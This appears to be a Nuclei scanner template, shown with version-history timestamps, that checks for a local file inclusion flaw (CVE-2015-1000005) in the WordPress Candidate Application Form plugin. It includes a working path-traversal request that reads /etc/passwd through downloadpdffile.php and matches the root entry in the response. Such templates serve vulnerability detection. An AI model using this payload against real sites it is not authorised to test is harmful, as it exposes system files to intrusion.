2022-08-06 16:54:58 +00:00
id : CVE-2015-1000005
2022-02-12 17:38:06 +00:00
info :
2022-04-21 21:16:41 +00:00
name : WordPress Candidate Application Form <= 1.3 - Local File Inclusion
2022-02-12 17:38:06 +00:00
author : dhiyaneshDK
severity : high
2022-08-10 07:42:37 +00:00
description : |
WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
2022-08-10 07:42:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
2022-08-25 08:56:24 +00:00
- http://www.vapidlabs.com/advisory.php?v=142
2022-04-21 21:16:41 +00:00
classification :
2022-08-25 08:56:24 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2015-1000005
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.04406
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.91313
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : candidate-application-form_project
product : candidate-application-form
tags : wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
2022-02-12 17:38:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-12 17:38:06 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200